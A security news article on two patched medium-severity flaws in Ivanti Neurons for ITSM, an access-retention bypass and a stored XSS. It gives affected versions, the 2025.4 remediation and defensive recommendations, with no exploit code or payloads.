Ivanti Neurons for ITSM Vulnerabilities Expose User Sessions to Remote Attackers
Ivanti has recently addressed two medium-severity vulnerabilities in its Neurons for IT Service Management (N-ITSM) platform, which could potentially allow remote authenticated attackers to maintain unauthorized access or harvest session data from other users. The company has confirmed that, as of the time of disclosure, there is no evidence of these vulnerabilities being exploited in the wild. Both issues were responsibly reported and have been patched in the latest release, version 2025.4.
CVE-2026-4913: Improper Path Protection Flaw
The first vulnerability, identified as CVE-2026-4913, has been assigned a CVSS score of 5.7, categorizing it as medium severity. This flaw arises from inadequate protection of an alternate path in Ivanti N-ITSM versions prior to 2025.4. Specifically, a remote authenticated attacker could exploit this vulnerability to retain access to the system even after their account has been disabled by an administrator. Such a bypass is particularly concerning in enterprise environments where promptly revoking access is crucial, especially during incidents involving insider threats or when offboarding employees. The vulnerability is network accessible, requires low privileges, and necessitates user interaction to be triggered, contributing to its medium severity rating.
CVE-2026-4914: Stored Cross-Site Scripting (XSS) Vulnerability
The second vulnerability, CVE-2026-4914, is a stored cross-site scripting (XSS) flaw with a CVSS score of 5.4, also classified as medium severity. In Ivanti N-ITSM versions prior to 2025.4, this vulnerability allows a remote authenticated attacker to inject malicious scripts that execute within the context of other users’ sessions. By exploiting this flaw, an attacker could obtain limited information from other user sessions, potentially capturing session tokens, credentials, or sensitive ITSM data. The attack requires user interaction, meaning a victim must access the maliciously crafted content for the exploit to succeed. The vulnerability’s cross-scope impact indicates that its effects can extend beyond the immediate session.
Affected Versions and Remediation
Both vulnerabilities affect Ivanti Neurons for ITSM version 2025.3 and all prior releases, across both on-premise and cloud deployments. To mitigate these risks, Ivanti has released version 2025.4, which addresses these security issues.
– On-Premise Customers: Manual upgrade to version 2025.4 is required. The update is available through the Ivanti License System (ILS).
– Cloud Customers: No action is necessary, as Ivanti applied the fix to all cloud environments on December 12, 2025.
Ivanti strongly urges all on-premise customers to apply the 2025.4 update immediately. While no indicators of compromise are currently available, and no public exploitation has been observed, organizations running older versions should prioritize this upgrade, particularly given the access-retention risk posed by CVE-2026-4913 in environments with strict access control policies.
Broader Context and Implications
These vulnerabilities underscore the ongoing challenges in securing enterprise IT service management platforms. The improper path protection flaw (CVE-2026-4913) highlights the importance of robust access control mechanisms and the need for administrators to ensure that user deactivation processes are comprehensive and effective. Failure to address such issues can lead to unauthorized access, data breaches, and potential insider threats.
The stored XSS vulnerability (CVE-2026-4914) serves as a reminder of the persistent risks associated with web application security. Cross-site scripting attacks can be particularly insidious, as they exploit the trust users place in a legitimate application. By injecting malicious scripts, attackers can hijack user sessions, steal sensitive information, and perform actions on behalf of the victim. This type of vulnerability emphasizes the need for rigorous input validation, output encoding, and regular security assessments to identify and remediate such flaws.
Recommendations for Organizations
To mitigate the risks associated with these vulnerabilities, organizations should consider the following actions:
1. Immediate Patch Application: Ensure that all instances of Ivanti Neurons for ITSM are updated to version 2025.4. This update addresses both CVE-2026-4913 and CVE-2026-4914, closing the identified security gaps.
2. Review Access Control Policies: Evaluate and strengthen access control mechanisms to ensure that user deactivation processes are thorough and effective. Implement monitoring to detect any unauthorized access attempts.
3. Enhance Web Application Security: Conduct regular security assessments focusing on web application vulnerabilities, including XSS. Implement best practices for input validation and output encoding to prevent script injection attacks.
4. User Training and Awareness: Educate users about the risks of interacting with untrusted content and the importance of reporting suspicious activities. User awareness can be a critical line of defense against exploitation attempts.
5. Monitor for Indicators of Compromise: Even though no active exploitation has been reported, organizations should monitor their systems for unusual activities that may indicate attempted exploitation of these vulnerabilities.
By proactively addressing these vulnerabilities and implementing robust security measures, organizations can enhance their resilience against potential attacks targeting IT service management platforms.
